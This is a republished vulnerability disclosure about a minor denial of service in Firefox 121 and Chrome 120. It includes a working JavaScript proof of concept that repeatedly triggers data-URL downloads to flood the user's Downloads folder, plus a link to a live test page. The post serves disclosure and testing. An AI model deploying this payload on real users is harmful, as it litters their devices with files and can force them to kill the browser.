Firefox 121 / Chrome 120 Denial Of Service
2024-1-23 03:54:3 Author: cxsecurity.com(查看原文) 阅读量:8 收藏

Firefox 121 / Chrome 120 Denial Of Service

Minor firefox DoS - semi silently polluting ~/Downloads with files (part 2) Tested on: firefox 121 and chrome 120 on GNU/linux Date: Thu Jan 18 08:38:28 AM UTC 2024 This is barely a DoS, but since it might affect Chrome too we decided to disclose it. If firefox user visits a specially crafted page, then firefox may create many files in `~/Downloads`, The user is notified about this in a small dialog, but there is no option to stop the downloads. The potential denial of service is that the user must manually delete the created files and this might be PITA especially on a phone. The code basically is: <pre> URL = "data:text/plain;,a";//can be very large with no net traffic link = document.createElement('a'); link.href = URL; link.download = 'joro_'; document.body.appendChild(link); function f() { if( !confirm("This will ruin your device with probability up to 199.99%")) return; setInterval("link.click();",1);//dobro } f(); </pre> There is no network traffic and in about 90 seconds firefox 121 created 3434 files at speed about 38 files/second. google chrome 120 prompts about multiple downloads, and if the user allows it, it creates files at speed of 4.2 files/second, but it gives modal prompts, which we couldn't close from the GUI and had to kill the process. [Test online][1]: if you are vulnerable [1]: https://j.ludost.net/download2.html -- guninski



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2024010071
如有侵权请联系:admin#unsafe.sh